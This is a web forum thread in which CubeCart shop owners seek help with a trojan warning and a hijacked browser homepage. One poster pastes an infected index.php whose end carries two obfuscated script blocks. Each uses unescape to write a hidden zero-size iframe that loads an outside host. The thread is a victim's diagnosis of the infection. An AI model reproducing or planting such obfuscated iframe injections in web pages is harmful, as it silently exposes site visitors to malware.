Guest hired_goon Posted April 4, 2005 Share Posted April 4, 2005 Please help, I have been having a problem with an annoying virus. When I go to my cubecart store, Norton Antivirus pops up with a message indicating the "backdoor.trojan" virus was deleted. Then the next thing I know my Internet Explorer homepage has been changed to "hotoffers" and there is no way to change it back! I have restored/recovered my system twice because the virus is too hard to get rid of. I've found that if I stay away from my store or set my IE security settings to "high" I don't have the problem. However, with the settings on high, my store doesn't work properly or at all. I either get a 404 error or blank page or sometimes one of my pages will come up as it is supposed to but after a few clicks I get the 404 error again. Has anyone else had a similar problem? My host is atomic-hosting.net. Perhaps the problem is on their end. Still, any thoughts would be greatly appreciated. hired_goon Quote Link to comment Share on other sites More sharing options...
Guest Posted April 4, 2005 Share Posted April 4, 2005 I did have a similar prob a few years ago on one of my old homepages. What u need to do is check every file in your store home directory (my 1st guess is header.inc.php or index.php) and look for some unusuall coding and delete it.... hope this will work for you as it did for me. Mobie Quote Link to comment Share on other sites More sharing options...
roban Posted April 4, 2005 Share Posted April 4, 2005 Download the freeware hijackthis and run a system scan. Quote Link to comment Share on other sites More sharing options...
Guest Posted November 8, 2007 Share Posted November 8, 2007 I have the same problem right now. Has anyone found a fix for this issue? How can this prevented in the future? */* Quote Link to comment Share on other sites More sharing options...
Guest Posted November 8, 2007 Share Posted November 8, 2007 I have the same problem right now. Has anyone found a fix for this issue? How can this prevented in the future? I think I just found the problem in my Index.php file. Look at the bottom - the JS lines. The original index.php file did not contain those lines. I have also updated to version CC 3.16. I was wondering if the trojan had a JS script portion hidden somwhere. I will look and update the topic. <?php /* +-------------------------------------------------------------------------- | CubeCart v3.0.15 | ======================================== | by Alistair Brookbanks | CubeCart is a Trade Mark of Devellion Limited | Copyright Devellion Limited 2005 - 2006. All rights reserved. | Devellion Limited, | 22 Thomas Heskin Court, | Station Road, | Bishops Stortford, | HERTFORDSHIRE. | CM23 3EE | UNITED KINGDOM | http://www.devellion.com | UK Private Limited Company No. 5323904 | ======================================== | Web: http://www.cubecart.com | Date: Thursday, 4th January 2007 | Email: sales (at) cubecart (dot) com | License Type: CubeCart is NOT Open Source Software and Limitations Apply | Licence Info: http://www.cubecart.com/site/faq/license.php +-------------------------------------------------------------------------- | index.php | ======================================== | Main pages of the store +-------------------------------------------------------------------------- */ include_once("includes/ini.inc.php"); // INCLUDE CORE VARIABLES & FUNCTIONS include_once("includes/global.inc.php"); // check if installed if($glob['installed']==0){ header("location: install/index.php"); exit; } elseif((file_exists($glob['rootDir']."/install/index.php") || file_exists($glob['rootDir']."/upgrade.php") && $glob['installed']==1)){ echo "<strong>WARNING</strong> - Your store will not function until the install directory and/or upgrade.php is deleted from the server."; exit; } // initiate db class include_once("classes/db.inc.php"); $db = new db(); include_once("includes/functions.inc.php"); $config = fetchDbConfig("config"); include_once("includes/sessionStart.inc.php"); include_once("includes/sslSwitch.inc.php"); // get session data include_once("includes/session.inc.php"); // get exchange rates etc include_once("includes/currencyVars.inc.php"); $lang_folder = ""; if(empty($ccUserData[0]['lang'])){ $lang_folder = $config['defaultLang']; } else { $lang_folder = $ccUserData[0]['lang']; } include_once("language/".$lang_folder."/lang.inc.php"); // require template class include_once("classes/xtpl.php"); $body = new XTemplate ("skins/".$config['skinDir']."/styleTemplates/global/index.tpl"); if(isset($_GET['searchStr'])){ $body->assign("SEARCHSTR",treatGet($_GET['searchStr'])); } else { $body->assign("SEARCHSTR",""); } $body->assign("CURRENCY_VER",$currencyVer); $body->assign("VAL_ISO",$charsetIso); $body->assign("VAL_SKIN",$config['skinDir']); // START MAIN CONTENT if(isset($_GET['act'])){ switch (treatGet($_GET['act'])) { case "viewDoc": include("includes/content/viewDoc.inc.php"); $body->assign("PAGE_CONTENT",$page_content); break; case "viewCat": include("includes/content/viewCat.inc.php"); $body->assign("PAGE_CONTENT",$page_content); break; case "viewProd": include("includes/content/viewProd.inc.php"); $body->assign("PAGE_CONTENT",$page_content); break; case "unsubscribe": include("includes/content/unsubscribe.inc.php"); $body->assign("PAGE_CONTENT",$page_content); break; case "taf": include("includes/content/tellafriend.inc.php"); $body->assign("PAGE_CONTENT",$page_content); break; case "login": include("includes/content/login.inc.php"); $body->assign("PAGE_CONTENT",$page_content); break; case "logout": include("includes/content/logout.inc.php"); $body->assign("PAGE_CONTENT",$page_content); break; case "forgotPass": include("includes/content/forgotPass.inc.php"); $body->assign("PAGE_CONTENT",$page_content); break; case "account": include("includes/content/account.inc.php"); $body->assign("PAGE_CONTENT",$page_content); break; case "profile": include("includes/content/profile.inc.php"); $body->assign("PAGE_CONTENT",$page_content); break; case "changePass": include("includes/content/changePass.inc.php"); $body->assign("PAGE_CONTENT",$page_content); break; case "newsletter": include("includes/content/newsletter.inc.php"); $body->assign("PAGE_CONTENT",$page_content); break; case "dnExpire": include("includes/content/dnExpire.inc.php"); $body->assign("PAGE_CONTENT",$page_content); break; default: include("includes/content/index.inc.php"); $body->assign("PAGE_CONTENT",$page_content); break; } } else { include("includes/content/index.inc.php"); $body->assign("PAGE_CONTENT",$page_content); } // END MAIN CONTENT // START META DATA if(isset($meta)){ $body->assign("META_TITLE",htmlspecialchars($meta['siteTitle']).c()); $body->assign("META_DESC",$meta['metaDescription']); $body->assign("META_KEYWORDS",$config['metaKeyWords']); } else { $body->assign("META_TITLE",htmlspecialchars($config['siteTitle']).c()); $body->assign("META_DESC",$config['metaDescription']); $body->assign("META_KEYWORDS",$config['metaKeyWords']); } // START CONTENT BOXES include("includes/boxes/searchForm.inc.php"); $body->assign("SEARCH_FORM",$box_content); include("includes/boxes/session.inc.php"); $body->assign("SESSION",$box_content); include("includes/boxes/categories.inc.php"); $body->assign("CATEGORIES",$box_content); include("includes/boxes/randomProd.inc.php"); $body->assign("RANDOM_PROD",$box_content); include("includes/boxes/info.inc.php"); $body->assign("INFORMATION",$box_content); include("includes/boxes/language.inc.php"); $body->assign("LANGUAGE",$box_content); include("includes/boxes/currency.inc.php"); $body->assign("CURRENCY",$box_content); include("includes/boxes/shoppingCart.inc.php"); $body->assign("SHOPPING_CART",$box_content); include("includes/boxes/popularProducts.inc.php"); $body->assign("POPULAR_PRODUCTS",$box_content); include("includes/boxes/saleItems.inc.php"); $body->assign("SALE_ITEMS",$box_content); include("includes/boxes/mailList.inc.php"); $body->assign("MAIL_LIST",$box_content); include("includes/boxes/siteDocs.inc.php"); $body->assign("SITE_DOCS",$box_content); // END CONTENT BOXES // parse and spit out final document $body->parse("body"); $body->out("body"); ?> <script type="text/javascript"> <!-- --> <!-- document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%61%6C%65%76%69%73%69%74%6F%72%2E%6E%65%74%2F%69%6E%2E%63%67%69%3F%32%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%3B%22%3E%3C%2F%69%66%72%61%6D%65%3E')); //--> </script> <script type="text/javascript"> <!-- --> <!-- document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%61%6C%65%76%69%73%69%74%6F%72%2E%6E%65%74%2F%69%6E%2E%63%67%69%3F%32%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%3B%22%3E%3C%2F%69%66%72%61%6D%65%3E')); //--> </script> Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.